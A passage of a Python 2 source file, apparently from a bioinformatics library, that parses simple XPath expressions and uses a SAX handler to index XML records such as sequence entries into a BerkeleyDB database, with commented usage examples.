    # Only supports two formats
    #   //tag
    #   //tag[@attr="value"]
    m = _pat_tag_re.match(s)
    if m is None:
        raise TypeError("Cannot yet understand the XPath expression: %r" %
                        (s,))
    tag = m.group(1)
    if m.group(3) is not None:
        varname = m.group(3)
        varvalue = m.group(4)[1:-1]
        node_matcher = (tag, [(varname, varvalue)])
    else:
        node_matcher = (tag, None)
    return node_matcher
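
# For illustration (hand-worked examples, not from the original source):
#   parse_simple_xpath("//entry")
#       -> ("entry", None)
#   parse_simple_xpath('//entry[@id="A12345"]')
#       -> ("entry", [("id", "A12345")])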
def xpath_index(dbname,
                filenames,
                primary_namespace,
                extract_info,    # pair of (data_value, xpath)
                format = "sequence",
                record_tag = Std.record.tag,
                creator_factory = None,
                ):
    if creator_factory is None:
        import BerkeleyDB
        creator_factory = BerkeleyDB.create

    data_names = [x[0] for x in extract_info]
    if primary_namespace not in data_names:
        raise TypeError(
            "No way to get the %r field needed for the primary (unique) id" %
            (primary_namespace,))
    data_names.remove(primary_namespace)

    for prop, xpath in extract_info:
        if prop == primary_namespace:
            break
    else:
        raise TypeError("Property %r has no xpath definition" %
                        (primary_namespace,))

    creator = creator_factory(dbname, primary_namespace, data_names)
    builder = GrabXPathNodes(extract_info)
    for filename in filenames:
        creator.load(filename, builder = builder, record_tag = record_tag,
                     formatname = format)
    creator.close()
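
# A hedged usage sketch (the file name and namespaces are invented; the
# default creator_factory comes from the sibling BerkeleyDB module):
#   xpath_index("swissprot-index", ["sprot38.xml"],
#               primary_namespace = "id",
#               extract_info = [("id", "//entry"),
#                               ("desc", '//note[@lang="en"]')])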
class GrabXPathNodes(xml.sax.ContentHandler):
    def __init__(self, extractinfo):
        self._fast_tags = _fast_tags = {}
        for property, xpath in extractinfo:
            tag, attrs = parse_simple_xpath(xpath)
            _fast_tags.setdefault(tag, []).append( (attrs, property) )

        # for doing the endElement in the correct order,
        # which is opposite to the input order
        self._rev_tags = _rev_tags = {}
        for k, v in self._fast_tags.items():
            v = v[:]
            v.reverse()
            self._rev_tags[k] = v

    def uses_tags(self):
        return self._fast_tags.keys()

    def startDocument(self):
        self._text = ""
        self._capture = []
        self.document = {}

    def startElement(self, tag, attrs):
        if not self._fast_tags.has_key(tag):
            return
        # collect every property this element satisfies, then push a
        # single capture record so that endElement pops exactly once
        needed = []
        for want_attrs, prop in self._fast_tags[tag]:
            if want_attrs is None:
                needed.append(prop)
            else:
                for k, v in want_attrs:
                    if not attrs.has_key(k) or attrs[k] != v:
                        break
                else:
                    needed.append(prop)
        self.save_info(needed)

    def characters(self, s):
        if self._capture:
            self._text += s

    def save_info(self, needed):
        if not self._capture:
            self._text = ""
        self._capture.append( (needed, len(self._text)) )

    def get_info(self):
        needed, n = self._capture.pop()
        s = self._text[n:]
        return s, needed

    def endElement(self, tag):
        if not self._rev_tags.has_key(tag):
            return
        text, needed = self.get_info()
        for need in needed:
            self.document.setdefault(need, []).append(text)
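
# A minimal end-to-end sketch (not part of the original module; the XML
# document, tags and attribute names are invented for illustration):
if __name__ == "__main__":
    handler = GrabXPathNodes([("id", "//entry"),
                              ("desc", '//note[@lang="en"]')])
    xml.sax.parseString('<root><entry>A12345</entry>'
                        '<note lang="en">human readable</note></root>',
                        handler)
    # expected contents: {'id': ['A12345'], 'desc': ['human readable']}
    print handler.document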